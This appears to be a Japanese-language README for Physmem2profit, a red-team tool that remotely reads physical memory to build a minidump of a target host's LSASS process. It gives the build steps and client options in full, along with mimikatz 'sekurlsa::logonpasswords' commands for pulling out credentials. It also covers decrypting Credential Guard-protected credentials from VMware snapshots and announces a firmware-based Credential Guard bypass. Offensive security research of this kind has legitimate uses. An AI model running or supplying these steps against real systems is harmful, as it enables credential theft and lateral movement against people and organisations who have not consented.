
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
Physmem2profit は、物理メモリをリモートで解析することにより、ターゲットホストの LSASS プロセスのミニダンプを作成するために使用できます。この研究の意図は、認証情報の窃取に対する代替アプローチを提案し、物理メモリにアクセスできる他のドライバをサポートするように拡張できるモジュラーフレームワークを作成することです。Physmem2profit は、Mimikatz でさらに解析できる LSASS のミニダンプ (.dmp) を生成します。このツールは Cobalt Strike を必要としませんが、SOCKS プロキシを使用したビーコン上で問題なく動作するはずです。

このツールには2つのコンポーネントがあります。
physmem2profit.exe
physmem2profit Python モジュール
git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln をビルドします。bash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] を実行します。
source physmem2profit/client/.env/bin/activate を実行します。このコマンドは、install.sh によって作成された virtualenv をアクティブにします。cd physmem2profit/client を実行し、続けて python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] を実行します。
physmem2profit.exe が実行されている必要があります。output/[label]-[date]-lsass.dmp に LSASS ミニダンプが書き込まれます。mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit" を実行します。Credential Guard によって保護されている資格情報を復号するには、Secure World に保存されている暗号化キーへのアクセスを取得する必要があります。テスト目的で、Physmem2profit は VMware Fusion/Workstation スナップショット(.vmem ファイル)から Secure World のデータを取得することをサポートしています。これにより、Mimikatz の助けを借りて Credential Guard によって保護されている資格情報を復号できます。
msinfo32 を実行して、Virtualization-based security Services Running が Credential Guard と表示されることを確認します。python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp に書き込まれます。ミニダンプには Secure World のデータを保持する特別なストリームが含まれており、Mimikatz が暗号化キーを特定できるようになります。output/[label]-[date]-secure-world.raw にも保存されます。mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit" を実行します。S3 Resume firmware vulnerability を悪用して Credential Guard をバイパスするサポートは、私たちの Disobey トーク で実演したもので、近日公開予定です :)
Rethinking Credential Theft | この認証情報窃取アプローチが選ばれた理由を説明するブログ記事
Physmem2profit は @b3arr0 と @TimoHirvonen によって開発されています。
貢献してくれた方々: